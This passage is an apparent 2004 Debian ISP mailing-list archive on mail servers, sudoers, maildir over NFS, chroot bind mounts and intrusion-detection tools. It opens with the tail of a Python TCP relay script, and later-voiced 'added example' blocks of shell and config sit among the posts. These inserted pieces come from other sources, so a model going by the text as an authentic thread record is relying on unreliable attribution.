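    reader, writer = await asyncio.open_connection("127.0.0.1", bound_port(relay))
    writer.write(payload)
    await writer.drain()
    got = await reader.readexactly(len(payload))
    writer.close()
    relay.close()
    echo.close()
    return got


def selftest(payload=b"ping"):
    """Send payload through the relay to the echo server; return what came back."""
    return asyncio.run(_roundtrip(payload))


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit(f"usage: {sys.argv[0]} LISTEN_HOST LISTEN_PORT TARGET_HOST TARGET_PORT")
    lh, lp, th, tp = sys.argv[1], int(sys.argv[2]), sys.argv[3], int(sys.argv[4])

    async def serve():
        server = await start_relay(lh, lp, th, tp)
        async with server:
            await server.serve_forever()

    asyncio.run(serve())
```

Two things a practitioner would put next to this. First, on current kernels the original question has direct answers that need no relay process: `setcap cap_net_bind_service=+ep` on the daemon binary, the `net.ipv4.ip_unprivileged_port_start` sysctl (Linux 4.11 and later), or an iptables `-t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 5432` rule. Second, whichever way the port is forwarded, what travels on 995 is still the plain postgres protocol: borrowing the pop3s port number buys no encryption, so wrap it in TLS (stunnel, or postgres's own ssl setting) before letting it cross the campus network.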

Re: Still Considering Debian - But Stuck!

2004-02-02 Thread Dan MacNeil

I don't have a footnote, but I believe a recent Linux Journal article says
that the 2.6 kernel uses a POSIX threads library which is much nicer than
LinuxThreads and that Red Hat has backported this support to RH9 and the
2.4 kernel.

It should be possible to download the Red Hat 2.4 patches.


On Mon, 2 Feb 2004, Dr. G Wu wrote:

> RH9 supports NPTL, which might explain your problem.
> could you also have a look at this post.
> http://forums.gentoo.org/viewtopic.php?t=38138
> It is a hot discussion about why Java is slower on Linux than on
> Windows, slower on Gentoo than on RH9, whether NPTL would help boost
> the performance.
> regards,
> Ben
>
>
> On Monday 02 February 2004 6:24 pm, Fred Whipple wrote:
> > Hi Everyone,
> >
> > A while back I asked for some feedback and got a very rich set of
> > info from folks about Debian used in a stable ISP environment as
> > compared to other OS's and distributions.  All the info was very
> > helpful and helped us further solidify our desire (though not yet
> > decision) to make Debian our platform as we move forward.
> >
> > We've run into a couple rather HUGE issues, though, that I'd like
> > to get further feedback on.  Not that I couldn't figure it all out
> > for myself, but nothing beats someone else's experience when it
> > comes to saving me the time and heartache ;-)  Just about everyone
> > warned me that the stable Debian distribution would be old and well
> > tested/maintained, but I'm not sure I was prepared for just HOW
> > old...
> >
> > Our company uses Java --- a LOT of Java.  We therefore use a lot of
> > threads, and a lot of threads.  And a whole mess of threads, too.
> > Under Red Hat 7.3, we found that when the system had a total of
> > say, 10,000 PID's given out (nearly all of them to threads) the
> > system would become very unstable.  When we moved to Red Hat 9 for
> > the affected systems, which includes the new O(1) scheduler, and
> > either a different kind of thread support in either the kernel or
> > GlibC, this problem went away. I'm honestly not sure who is
> > responsible for the way threads are handled, and I suspect it's not
> > exclusively the kernel, but under RH9 each JVM (or any app with
> > threads) gets a single PID as normal and all very strange behavior
> > that we saw under RH7.3 disappears.
> >
> > I see that Debian 3.0r2 includes a nicely aged (like fine cheese)
> > Linux 2.2 kernel.  While I'm certain the aging process only makes
> > its flavour stronger and more delectable, I'm afraid it's going to
> > choke at the thought of 10,000 threads.  Say nothing of 20,000.
> > Now I imagine it's not so difficult to simply compile a recent 2.4
> > (2.5?) kernel and go from there.  Is this fair?  Or would you
> > suppose that the current stable Debian is too old in other areas to
> > properly handle kernel 2.4?
> >
> > Even if I replace the kernel, I'm concerned that there's more
> > involved with the more efficient handling of threads from RH 7.3 to
> > RH 9 than just a kernel change -- I have to think there was a
> > significant rework of some libraries that made threads more
> > efficient under RH9 as well. Would anyone be able to identify
> > exactly what that re-working was, and conjecture if they think it
> > can be done under 3.0r2?  For that matter, would I at that point be
> > running so much new technology that I may as well be running an
> > unstable distribution of Debian?
> >
> > Finally, while I'm messing around with the kernel, I'd have to
> > include support for ext3fs.  In our environment, journaling is not
> > an option, it's a base requirement.  Of course replacing the kernel
> > would pretty much give me kernel-level support for it.  From that
> > point, how complicated is it to get the rest of the tools to play
> > nicely with ext3fs?  I'd imagine that a large set of tools would
> > need to be replaced, including e2fsck, mount, umount, etc.
> >
> > Thanks once again for all the info so far!
> >
> > -Fred Whipple
>

configure anomy sanitizer to drop not defang ?

2004-02-05 Thread Dan MacNeil

anomy sanitizer works well with postfix, but as far as I can tell, it
can't be configured to drop messages instead of defanging them.

I plan to configure sanitizer to add a tag to bad messages and then use
procmail to quarantine messages with that tag. Is there a better way?

Is there something that does what sanitizer does, works with postfix and
allows me to drop messages completely?

Mimedefang seems ideal, but it only works with sendmail.


Re: configure anomy sanitizer to drop not defang ?

2004-02-05 Thread Dan MacNeil

> What's wrong with sendmail?

Well, mostly that I've bought into the postfix fanboy propaganda that
postfix is superior for speed, security, ease of use and world peace.



##
On Thu, 5 Feb 2004, Lucas Albers wrote:

> What's wrong with sendmail?
> I use it with mimedefang, and it works awesome.
> I can do spam filtering, greylisting, ptr-helo checking, virus scanning,
> extension filtering, mimetype-filtering, zipfile extension blocking,etc.
> The correct behavior with mimedefang is to generate a bounce for rejected
> spam, and discard for detected virus's. This is all at the 5xx level.
> You can also query internal mail servers/ldap servers to determine if an
> account exists before accepting mail from that sender or recipient.
> So you only accept mail from a sender, if that sender exists on one of
> your internal systems.
> My external mx is a debian sendmail 8.12.3, mimedefang 2.38 system and it
> handles all department mail load fine.
>





Re: How do you manage Perl modules?

2004-02-08 Thread Dan MacNeil

I'm in a similar situation; last night I installed spamassassin & razor from
backports.org. It seems to be working OK.

Fortunately for me, I don't have to worry about being forward compatible
with an existing Bayes db.

For you, a (maybe painful) alternative to going to unstable is to discard
your older Bayes and automatic whitelist files.

Another alternative is to dump at least your whitelist to text, and then
script an import.

btw, the first time you ran sa-learn did you get an error?

something like:


"whatsits_foo.a not in @INC --needed for Digest::SHA1"

I tried to make the problem go away with apt-get but got something like:

"blah is already the current version"

I succeeded in making the problem go away w/

/usr/bin/perl -MCPAN -e 'install Digest::SHA1'

#

On Sun, 8 Feb 2004, Craig Sanders wrote:

> On Fri, Feb 06, 2004 at 05:41:18PM -0500, Kris Deugau wrote:
> > However, I've just discovered that there's also a bad version mismatch
> > between the "default" libdb version used by DB_File in RedHat, and the one in
> > Debian (db3 in RedHat vs db1 [I think] in Debian).  I also discovered that
> > this has been included as a part of the monolithic perl-5.6.1 package, and I
> > *really* don't want to go anywhere near backporting that myself or using a
> > third-party backport.
> >
> > I discovered this in trying to get the SA2.63 install (from backports.org) to
> > recognize the ~40M global Bayes dbs and per-user AWL files;  instead I
> > discover pairs of .dir + .pag files for AWL (which I vaguely recall are an
> > artifact of db1) and SA won't open the existing bayes_* files.
>
> sounds like you've run into a reason to upgrade to unstable.
>
> you have three choices:
>
> 1. backport perl 5.8.x and libdb4 and all associated modules and other
>packages.
>
> 2. try to find a backports archive where someone else has done the same.
>
> 3. point sources.list at unstable and either 'apt-get install' perl and
>other packages, or 'apt-get dist-upgrade'.
>
> choice 1 is a lot of work.
>
> choice 2 doesn't really offer any benefits over just upgrading to 'unstable',
> or upgrading certain packages to their 'unstable' versions.
>
> choice 3 will result in the least problems, and will be better tested - there
> are far more people using unstable than there are using backports of perl.
>
> > Is there something like cpan2rpm or cpanflute for Debian?  I'd like to
> > pull in current versions of Perl modules
>
> dh-make-perl can fetch a package from CPAN and produce a working package that
> is good enough for local use (but not "polished" enough to upload to debian for
> re-distribution).
>
> > (or even just recompile the
> > stable version against different libs).
>
> this is always an option.  it's called 'back-porting'.  download the debianised
> source from unstable (along with any build dependancies) and build it.
>
>
> > I *could* hack together some bits to force db3 to work by building on
> > RedHat, and using alien to install... but that's just plain ugly and as
> > I've already discovered it *will* break because of differences in how
> > RedHat and Debian handle the core Perl install and addon modules.
>
> really, upgrading to 'unstable' will be the least-hassle option.
>
> 'unstable' means that the entire system is in flux, that it changes constantly.  it
> does not mean that the packages in it are unreliable.
>
> craig
>
> ps: i've been running ALL of my production servers on 'unstable' since 1995.
> i upgrade them semi-regularly.  no major problems.
>
>
>






Community Network $8000 contest

2004-02-08 Thread Dan MacNeil

I'm not affiliated with these folks but this $8000 contest may be of
interest to folks on this list. Feel free to pass this on to other lists,
this is the only list I'm sending it to.


#
Community Network Open Source Package Awards program

http://www.afcn.org/opensource/

[...]
A key service of most community networks (CNs) is providing
Internet-based services to community, civic, and nonprofit groups.
Community networks need an easy to install and easy to manage suite of
information services that has an integrated and easy to use Web interface,
so that volunteers and staff who are not Unix experts can set up,
configure, and support service packages for local civic and community
groups.

 With financial support from its partner, the University of Baltimore
School of Information Arts and Technologies, the Association For Community
Networking offers two awards of $4000 each for the Open Source-based
service packages that most successfully meets all of the specifications
outlined below. The two awards are designed to meet the needs of most
community networks.






Re: qmail or postfix? (was: RE: What is the best mailling list manager for qmail and Domain Tech. Control ?)

2004-02-19 Thread Dan MacNeil

> http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/postfix.html
says at the very bottom:

Postfix is only available in source form,
not as precompiled or prepackaged binaries.
There is a list of FTP sites that hold the
source tarball on the official web site.

I have apt-get install'd postfix so I suspect this is not true. If this is
an error, there may be others.

The biggest complaint I've heard about qmail is that its license requires
you to install binaries according to the taste of the creator. This means
that things are the same on Debian, Solaris and Red Hat, but it also makes
it less "standard" if all you use is one distribution.



On Thu, 19 Feb 2004, Bjørnar Bjørgum Larsen wrote:

> I am in the process of choosing between postfix and qmail for our mail
> relays. I've not decided yet. However, I am surprised by the fact that
> many people who prefer postfix, also enjoy posting unqualified[0]
> statements[1][2][3] about qmail.
>
> If anyone have properly grounded views, please share!
>
> For example, I'd like comments on
> http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/postfix.html
> and
> http://homepages.tesco.net/~J.deBoynePollard/Reviews/UnixMTSes/qmail.html
>
>
>
> [0] A _qualified_ statement would e.g. be "qmail is trivially DoS'ed by sending 
> emails with no subject at a rate of 2 per second". Typical unqualified statements 
> are shown below.
>
> [1] Michael Loftis wrote (about qmail):
> > First is, unless they've made design changes,
> > it's trivial to DoS.
>
> Really? How would you DoS qmail? Could the same attack be used to DoS postfix?
>
> [2] Michael Loftis also wrote (about qmail):
> > Second, it doesn't scale so well, but unless
> > you're talking upwards of about 3-5k/msgs/hr
> > you might not run into it.
>
> Really? Quoting Bernstein quoting Bill Weinman (cr.yp.to/qmail/users.html):
> "Our busiest list is about 250 messages X 1800 subscribers
> (avg mail deliveries: 450,000 transactions per day). Sendmail
> was barfing badly on this, and qmail seems to be doing real
> well. The machine is a Pentium 90 running Linux 2.0.13 with
> 64Mb of RAM. I have the spawn limit set at 100. I am *very*
> impressed."
>
> How was the qmail that didn't scale well configured? On what hardware?
>
> [3] Craig Sanders wrote:
> > ps: qmail is a bad idea.  postfix is better.
>
> Your conclusion may be right, but the arguments are missing. Would you please share?
>
>
> Thanks,
>
> :) Bjornar
>
>
>





/etc/sudoers precedence question

2004-02-20 Thread Dan MacNeil

Given the sudoers file below, omacneil (as a member of wheel) should be
able to do anything with a password and should be able to run "update"
with no password.

I can run everything, but only with a password.

What am I missing?

Reversing the order of the %wheel & omacneil lines doesn't change things.


###
# User privilege specification
root     ALL=(ALL) ALL
ken      ALL=(ALL) ALL

Defaults !lecture, insults
%wheel   ALL=(ALL)   ALL
omacneil localhost=NOPASSWD: /usr/cs/2002/omacneil/sbin/update






Re: /etc/sudoers precedence question

2004-02-21 Thread Dan MacNeil

> Are you running the "update" command using the full path?
>
> /usr/cs/2002/omacneil/sbin/update

I am prompted for a password if I say:

sudo /usr/cs/2002/omacneil/sbin/update

or if I say

sudo update

which update gives me

/usr/cs/2002/omacneil/sbin/update.

I am aware that the current sudo file allows sudo bash. The goal is audit
rather than control.

Thanks for the reply.


On Sat, 21 Feb 2004, MB wrote:

> Dan,
>
> Are you running the "update" command using the full path?
>
> /usr/cs/2002/omacneil/sbin/update
>
>
> Your sudo file allows running the above command only with no password.
> Also you should note that a sudo file like this allows for you to get a
> root shell via "sudo bash", which may or may not be what you want to allow.
>
> Mark
>
> Dan MacNeil wrote:
>
> >Given the sudoers file below omacneil (as a member of wheel) should be
> >able to do anything with a password and should be able to run "update"
> >with no password.
> >
> >I can run everything but only with a password.
> >
> >What am I missing?
> >
> >reversing the order of %wheel & omacneil lines doesn't change things.
> >
> >
> >###
> ># User privilege specification
> >root     ALL=(ALL) ALL
> >ken      ALL=(ALL) ALL
> >
> >Defaults !lecture, insults
> >%wheel   ALL=(ALL)   ALL
> >omacneil localhost=NOPASSWD: /usr/cs/2002/omacneil/sbin/update
> >
> >
> >
> >
> >
>
>


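As an added example, not from the thread and not a claim about what was wrong on the poster's machine: sudo compares the Host field of each entry with the machine's own hostname (what gethostname() returns, or the FQDN when the fqdn option is set), so `localhost` only ever matches a machine actually named localhost. Separately, when several entries match the same user, host and command, the last matching entry is the one applied. The fragment below shows the two lines as posted beside a version that grants the passwordless command; the `update` path is the one from the post, everything else is illustrative.

```sudoers
# As posted. On a host named anything but "localhost" the second line never
# matches, so the %wheel line is the only match and sudo asks for a password.
%wheel   ALL=(ALL)       ALL
omacneil localhost=NOPASSWD: /usr/cs/2002/omacneil/sbin/update

# Corrected. ALL (or the real hostname) in the Host field, and the specific
# rule kept after the group rule, because the last match is the one applied.
%wheel   ALL=(ALL)       ALL
omacneil ALL=NOPASSWD: /usr/cs/2002/omacneil/sbin/update
```

`visudo -c` checks that the file parses; `sudo -l`, run as omacneil, prints the entries that match on this host and shows which of them carry NOPASSWD, which is the quickest way to see whether a Host field matched at all. One caveat the reply already touches on: the passwordless target lives under the user's own tree, so whoever can write that file can run anything as root without a password. With %wheel granting `sudo bash` anyway that changes little, but it is what the "audit rather than control" remark is accepting.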



web control panel|vpopmail / Tequila / courier / openLDAP / postfix

2004-03-01 Thread Dan MacNeil

We're getting enough domains and email accounts that doing things by hand
is getting to be a pain (even with some scripts).

We'd like to give our users a web control panel to handle email account
administration for their own domains.

We use:
Postfix
Courier-pop/imap
Squirrelmail
procmail
sanitizer/f-prot
spamassassin
openLDAP (soon)

Tequila seems almost perfect but it is in beta.

http://www.holgilein.de/coolprox/tequila/

There are testing packages for vpopmail but it seems to require putting
qmail into the mix.

http://www.inter7.com/vpopmail/postfix.txt

What are your experiences with these or other software libre web control
panels?







Re: debian on HP proliant

2004-04-17 Thread Dan MacNeil

> The installer from woody has built-in support for the cciss controller
> on at least the Proliant DL 580 G2.

> It works smoothly, but lacks support for the default installed 3com
> gig-ethernet adapter (tg3 driver), once installed,

The network installer for sarge detects the tg3 gig-ethernet adaptor
automagically. We're moving to Sarge now.


On Fri, 16 Apr 2004, Jose Alberto Guzman wrote:

> Nathan Eric Norman wrote:
> > On Fri, Jan 16, 2004 at 10:33:09AM -0500, Eric Sproul wrote:
> >
> >>On Fri, 2004-01-16 at 10:15, Francis Tyers wrote:
> >>
> >>>The onboard 'scsi' controller appears as a block device and not as a
> >>>scsi device under linux.
> >>>
> >>>01:03.0 RAID bus controller: Compaq Computer Corporation Smart Array
> >>>5i/532 (rev 01)
> >>>
> >>>i think it is...
> >>>
> >>>there is a driver in linux 2.4.x...
> >>
> >>The driver is called cciss, and supports the built in SmartArray
> >>controller as well as the higher-end optional RAID controllers like the
> >>641/642.
> >>
> >>Look in /proc/driver/cciss/ccissX (where X is the controller number,
> >>usually '0' for the built-in) for some basic info.
> >>
> >>Devices attached to these controllers appear as /dev/cciss/cXdXpX
> >>
> >>c=controller #
> >>d=logical drive #
> >>p=partition #
> >>
> >>Thus the first partition on the first logical drive on the built-in
> >>controller is /dev/cciss/c0d0p1.
> >
> >
> > Is anyone aware of a debian-installer image which supports cciss built
> > in?  The existing d-i supports cciss just fine, but as a module.
> >
>
>   The installer from woody has built-in support for the cciss controller
> on at least the Proliant DL 580 G2.
>
>   It works smoothly, but lacks support for the default installed 3com
> gig-ethernet adapter (tg3 driver), once installed, I usually either copy
> a recent kernel source and compile whatever I need, or install an
> eepro100 (or other supported) card to finish.
>
>   The trick is to install with the bf24 kernel:  version 2.4.18.
>
>   Check the help at the Woody CD install boot prompt.
>
>
> José
>
>
> PS.
> please reply to the list
>
>
>



RaiserFS via NFS

2004-04-17 Thread Dan MacNeil

I've just converted from mbox to maildir.

Right now there are some users with 500 files in a directory, and I expect
this figure to grow. ReiserFS is looking good.

The benefits of running a central storage server and a bunch of separate
web/smtp/pop3/spamfiltering/ftp servers, one storage server running not
much more than NFS, all connected with a cheap Gigabit switch, are also
appealing to me.

Is there any benefit to ReiserFS if I am accessing it via NFS?







Re: RaiserFS via NFS

2004-04-17 Thread Dan MacNeil

On Sat, 17 Apr 2004, Michelle Konzack wrote in part:

>But use a self-compiled Linux with nfs and nfsd compiled WITH
>"TCP" and "v3" support.

>if you mount your server add "nfsvers=3,tcp" to it otherwise it
>will use UDP which is realy not good.

Why? From my (maybe wrong?) reading of the docs, the advantage of TCP is
that it is hard to spoof given that it is connection oriented.

I plan to run NFS on a completely internal network and configure iptables
to drop packets from outside the network. The NFS server will not be
connected to the outside world and the application servers will have 2
NICs one for the internal Gb/sec 10.0.0.* network and one for the outside
world.

 Andrew Miehs writes in part:

> I suggest you all read
> http://www.porcupine.org/postfix-mirror/newdoc/NFS_README.html

> Especially when it comes to mail. With Maildir you will have less
> problems than with mbox, but you still do NOT have atomic transactions,
> and as such you will at some stage statistically have a problem.

Porcupine says in part:
[emphasis added]

> switch to maildir style, which needs *no* application-level lock
> controls).


Other people say:

>[DONT USE NFS FOR MAIL OR YOUR PRIVATE PARTS WILL
>  BE EATEN BY GOLD FISH]

See: the spec for maildir
http://www.qmail.org/man/man5/maildir.html

I can't say I've ever seen a convincing argument against maildir's
safety...

Am I right in that nobody on the list knows whether or not any advantage
to running ReiserFS is swallowed by NFS?



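The lock-free property the reply argues about comes from how maildir delivery is specified: write under a name nobody else can pick into tmp/, then make the message visible in new/ with a single link(2). Here is that protocol as an added example, not code from the thread or from any MTA; it assumes POSIX sh with ln, od and uname, and a hostname containing no "/" or ":". Because the only shared step is one atomic directory operation, two delivery agents on two NFS clients cannot interleave the way two mbox appenders can.

```sh
#!/bin/sh
# Added example, not from the thread: maildir delivery as the maildir spec
# describes it (tmp/ then link into new/). Assumes POSIX sh, ln, od, uname.

# deliver_maildir MAILDIR  < message
# Prints the path of the delivered file in new/.
deliver_maildir() {
    md=$1
    mkdir -p "$md/tmp" "$md/new" "$md/cur"
    # Unique name per spec: <seconds>.<pid>.<host>. The random middle part
    # guards against two deliveries by one pid within the same second.
    unique="$(date +%s).$$.$(od -An -N4 -tx1 /dev/urandom | tr -d ' \n').$(uname -n)"
    tmp="$md/tmp/$unique"
    new="$md/new/$unique"
    # Spec: the tmp name must not already exist. noclobber (-C) makes ">"
    # fail instead of truncating a file some other process owns.
    (umask 077; set -C; cat > "$tmp") || return 1
    # link() is atomic, including over NFS. A retransmitted NFS link() can
    # report failure after succeeding, so on error trust the link count.
    if ! ln "$tmp" "$new" 2>/dev/null; then
        [ "$(ls -l "$tmp" | awk '{print $2}')" -eq 2 ] || { rm -f "$tmp"; return 1; }
    fi
    rm -f "$tmp"
    printf '%s\n' "$new"
}

# claim_message MAILDIR NAME
# Reader side: move NAME from new/ to cur/ with the ":2," info suffix the
# spec requires there. rename() is atomic too, so no reader lock either.
claim_message() {
    mv "$1/new/$2" "$1/cur/$2:2," && printf '%s\n' "$1/cur/$2:2,"
}
```

Everything an mbox needs a lock for (appending, rewriting the file on delete) is here a create, a link or a rename on a per-message file, which is why the Postfix NFS notes the reply quotes single out maildir. What NFS still cannot give you is durability: `cat >` returns before the server has the data unless the mount is synchronous, so a delivery agent that must not lose mail would add an fsync of the tmp file before the link.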



domain registrar recommendation?

2004-04-29 Thread Dan MacNeil

Right now most of our domains are registered with register.com, support is
good, they provide DNS but... $35 per domain per year is pretty steep.

Eventually we'd like to be our own registrar or to use a domain wholesaler
like:

http://resellers.tucows.com/

From other lists, OpenSRS/tucows seems pretty good, but right now we aren't
adding 25 domains a year, which is apparently the break-even point.

Can anyone recommend a registrar?

Criteria in order of importance are:

0) Business integrity (no Network Solutions, please)
1) Almost perfect uptime
2) Ease of administration/support
3) price
4) Ease of transferring domains to us when we become a registrar.





ttysnoop openssh woody

2004-06-27 Thread Dan MacNeil

Does anyone have a recipe for getting ttysnoop working with openssh on
woody w/o recompiling openssh?

This guide:

http://64.233.161.104/search?q=cache:ieeFRmtUJ-AJ:www.forty-two.nl/documentation/HOWTOOPENSSHwithTTYSNOOP.pdf+ttysnoop/++ssh+snooptab++login+program&hl=en&lr=lang_en

...will do it, but I am too lazy to recompile OpenSSH.

The primary goal is collaboration, not spying, so I could set up telnet
limited to localhost & follow the fine man, but this seems an extra
step...





backup DNS question

2004-07-26 Thread Dan MacNeil

We have:
ns1.lctc.org
ns2.lctc.org

ns2.lctc.org is (apparently) down. It is in a locked and alarmed building.

How is this affecting users of our DNS?

Where in the fine manual is this information?

We've looked at the backup DNS chapter of the bind book. We've also, a
bunch of times, done a:

 dig @host_that_didnt_cache_us domainwehost.org

Things look OK: mail is flowing, websites are accessed, nobody has
complained. Still we feel uneasy...





proftpd chroot with mount --bind /source_dir/ /dest_dir/

2004-07-31 Thread Dan MacNeil

We don't have per-domain accounts; we have user accounts with access to
web files for various domains.

We're looking to chroot users' ftp sessions to their home directory, with
a "sites" subdirectory.

something like:

/               == /home/people/user
/sites          == /home/sites/
/sites/site_01  == /home/sites/site_01
/sites/site_02  == /home/sites/site_02


chrooting breaks symbolic links.

The (pretty good) faq at the proftpd site suggests using the

mount --bind /source_dir /dest_dir_01
mount --bind /source_dir /dest_dir_02

feature which is available in 2.4 and greater kernels.

I'm mildly concerned about how hundreds or thousands of these mounts will
affect stability.

I'm even more curious about implementation details from people that have
done this.

Everyone that has access to a site's files is in a group named after the
site.

btw, despite not making entries in fstab, the (3) mount --bind
commands I did survived a reboot, which is curious.


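An added example, not the poster's script, of one way to drive the bind mounts for the layout above from group membership. It takes from the post the convention that each site has a group named after it; the paths /home/sites and /home/people and the decision to go through /etc/fstab are assumptions. The chroot itself would come from `DefaultRoot ~` in proftpd.conf. The generator only prints fstab lines so they can be reviewed before being appended, and `mount -a` recreates them at boot.

```sh
#!/bin/sh
# Added example, not the poster's script. Emits /etc/fstab bind-mount lines so
# that /home/people/<user>/sites/<site> is a bind mount of /home/sites/<site>
# for every member of the group named after <site>. Paths and the group naming
# convention are assumptions taken from the post; nothing here runs mount(8)
# unless apply_bind_mounts is called, as root.

# gen_bind_fstab GROUPFILE SITES_ROOT PEOPLE_ROOT
# Prints one "<src> <dst> none bind 0 0" line per (site, member) pair.
# A group is treated as a site only if SITES_ROOT/<group> exists, so
# system groups such as "users" are skipped.
gen_bind_fstab() {
    groupfile=$1 sites=$2 people=$3
    while IFS=: read -r site _ _ members; do
        [ -n "$members" ] && [ -d "$sites/$site" ] || continue
        old_ifs=$IFS; IFS=,; set -- $members; IFS=$old_ifs
        for user in "$@"; do
            printf '%s/%s %s/%s/sites/%s none bind 0 0\n' \
                "$sites" "$site" "$people" "$user" "$site"
        done
    done < "$groupfile"
}

# apply_bind_mounts  < fstab-lines
# Creates each mount point and binds it unless /proc/mounts already lists it,
# so the script can be re-run after adding users. Needs root.
apply_bind_mounts() {
    while read -r src dst _; do
        mkdir -p "$dst"
        grep -qs " $dst " /proc/mounts && continue
        mount --bind "$src" "$dst" || echo "bind failed: $src -> $dst" >&2
    done
}

# Typical use, as root:
#   gen_bind_fstab /etc/group /home/sites /home/people >> /etc/fstab && mount -a
# or, without touching fstab:
#   gen_bind_fstab /etc/group /home/sites /home/people | apply_bind_mounts
```

A bind mount changes where a tree is visible, not who may touch it: inside the chroot the user still meets the real owner, group and mode bits of /home/sites/<site>, so the per-site group and the directory modes remain the access control, and nothing in the chroot should be writable by the user except what they are meant to edit. Before trusting the result, log in over ftp as one member and confirm that /sites shows only that user's sites and that `cd ..` from /sites goes nowhere.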



Re: IDS

2004-08-06 Thread Dan MacNeil

> I also want to use something like tripwire to set up file intregity.

apt-cache search tripwire
apt-cache show aide


On Fri, 6 Aug 2004, Tinus Nijmeijers wrote:

> I'm looking at securing a new server.
>
> i'll be using iptables to restrict acces and i want to install SNORT to
> watch the network.
> I also want to use something like tripwire to set up file intregity.
>
> however: tripwire seems OLD, last version (2.3.1) is from march 3, 2001
>
> i've also seen AIDE mentioned, same thing, aide version 0.10 is from
> november 2003
>
> is that a problem?
> any other apps I should look into concerning file intregity?
>
> eg:
> -samhain
> -integrit
> -tiger
>
> any experiences?
>
> thanks, tinus
>
>
>





Re: IDS

2004-08-10 Thread Dan MacNeil


On Tue, 10 Aug 2004, Tinus Nijmeijers wrote:

> On Fri, 2004-08-06 at 19:57, Dan MacNeil wrote:
> > > I also want to use something like tripwire to set up file intregity.
> >
> > apt-cache search tripwire
> > apt-cache show aide
> >
> I know, and, as I mentioned, they both seem OLD.

I believe the version of Aide in the package system is software libre
which the current version of tripwire is not.

Old != bad.  Some projects actually finish, reach maturity. When was the
last time the source code for ls was updated?

> can I assume that no-one here uses a file-integrity checker?

I do, but in a half-assed, sloppy, useless way. We rebuild our servers from
scratch (using a checklist) periodically. The next go around, I'm hoping
to pay attention.

I keep trying to inch toward actually using aide because it was what
allowed debian.

It is a pain in the ass, but what motivates me is the knowledge that this
year when debian.org and gnu.org were cracked, the problem was discovered
by aide.







Re: How to get hpasm module on HP Proliant?

2004-08-23 Thread Dan MacNeil

> Comments, suggestions and especially contributions are welcome!

Make the site a Wiki, or at least add a wiki section. Lowers the barrier
to contribution a great deal. If you fear vandalism, create a static
authoritative section also.

10 minutes work:

apt-get install kwiki
mkdir 
cd /var/www/data/cgi-bin/
kwiki-install

# optional

# paste into httpd.conf:
# http://www.perl.com/pub/a/2003/05/14/kwiki.html

  Alias /kwiki/ kwiki/
  <Directory kwiki/>
    Order allow,deny
    Allow from all
    Options ExecCGI FollowSymLinks Indexes
    AddHandler cgi-script .cgi
    DirectoryIndex index.cgi
  </Directory>


###

On Sun, 22 Aug 2004, Markus Oswald wrote:

> Am Fr, den 20.08.2004 schrieb Lucas Albers um 20:02:
>
> > We need a page for debian+hp solutions. I'm sure the information is out
> > their, as many debian machines run on hp hardware, but damn if I can track
> > it down to one logical location...
>
> I'm currently working on a website for that: www.debian-on-proliant.com
>
> Currently there is only a basic framework and a hardware-matrix online,
> but I hope to get some real content soon - just haven't had much free
> time during the last weeks.
>
> Comments, suggestions and especially contributions are welcome!
>
> best regards,
>   Markus
>





Re: Frozen Food Delivery Canada

2003-06-18 Thread Dan MacNeil

> Must resist urge to call them.. *twitch*

Since there is a small chance they are being DOS'd via forgery this would
be a good urge to resist.


On Wed, 18 Jun 2003, Splash Tekalal wrote:

> At 12:26 PM 6/18/2003 -0400, you wrote:
> >NORSEMAN CARTAGE LTD.
> >2458 HAINES RD
> >MISSISSAUGA, ONTARIO, CANADA
> >L4Y 1Y6
> >(905)275-0093
> >WWW.NORSEMANCARTAGE.COM
>
> Must resist urge to call them.. *twitch*
>
>
>
>
>
>




review host based intrusion detection sytems

2003-06-21 Thread Dan MacNeil

Doing an apt-cache search on "tripwire" and "intrusion"

I came up with these packages:

aide
bsign
fcheck
integrit

I've googled around a bit but haven't found much evaluation...

Does anyone have opinions on them?

We're setting up 3 new servers and I want to have an intrusion
detection database.

Ease of use is much, much more important than perfect security.

A while back we installed tripwire from tarball on one system but let it
get out of date. At another job, they had a homegrown system that was very
cumbersome: lots and lots of false alarms and a pain to update.

Of course it would be extra valuable if you could compare and contrast two
or more of these packages.




Re: CGI and PHP Scripts

2003-06-25 Thread Dan MacNeil

> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not
> using the www.domain.com/~username address, it did not execute the
> script, saying it was not in the document root.  Does anyone know what


the default document root is

/var/www

If you are setting up apache from scratch, I'd use the default as it
avoids much hassle w/ suexec.

If you want to use a different default docroot you need to recompile
suexec.

For our approach see:

http://csl.ltc.org/sys/project.d/suexec.d/install.txt



On Tue, 24 Jun 2003, Anand Atreya wrote:

> Hi,
>
> I have just recently begun using Debian and am in the process of
> migrating a FreeBSD 4.4 server over to it.  This server had many
> different users and allowed them to execute CGI and PHP scripts in their
> public_html folder (or any folder under it) as their own user, not as
> the user of the webserver, using mod_cgiwrap and mod_phpcgiwrap (from
> Steven Haryanto).  The site where this was located
> (http://steven.haryan.to/mod_cgiwrap/mod_cgiwrap.html) no longer exists,
> and in hindsight, it seems as if mod_cgiwrap was not a very secure
> solution to begin with.
> Does anybody have any recommendations on how to set up a virtual hosting 
> Apache server such that users can have CGI and PHP scripts execute as 
> themselves, without having to put #!/usr/bin/php at the top of php scripts, 
> and that is completely transparent to the user, also allowing them to place 
> scripts anywhere in their document root?
> (I have tried using suexec as it is installed with the Debian Apache
> package, but when I tried to execute a script in a virtual host, not
> using the www.domain.com/~username address, it did not execute the
> script, saying it was not in the document root.  Does anyone know what
> the default document root is for the Debian configuration of suexec?)
>
> Thanks a lot.
> -- Anand Atreya
>




Re: Server hacked - next...?

2003-06-30 Thread Dan MacNeil

chkrootkit is also available through apt-get

apt-get install chkrootkit


##

On Sun, 29 Jun 2003, Jason Lim wrote:

> Hi Russell,
>
> Well, SE Linux certainly seems like something that needs to be installed.
> Most annoying is that all the recent security updates were already done!
>
> The user CGIs run as the user's UID... suexec.
>
>
> Re-installing from scratch would be a real pain... the server runs on a
> 3ware array, and has hundreds of users, all active :-/
>
> Is there any way to verify the Integrity of the files somehow, and
> download/re-install any binaries that do not match the checksums or
> something? Does dpkg or some other Debian tool have this ability?
>
> If just a list of packages could be shown that do not match what is
> actually on the disk, those could be re-downloaded and re-installed, so at
> least the system can start working (right now, just typing "gcc" produces
> garbage on the screen, no doubt because some libraries have been
> replaced).
>
> Is there any tool that could search the system for root suid scripts (so
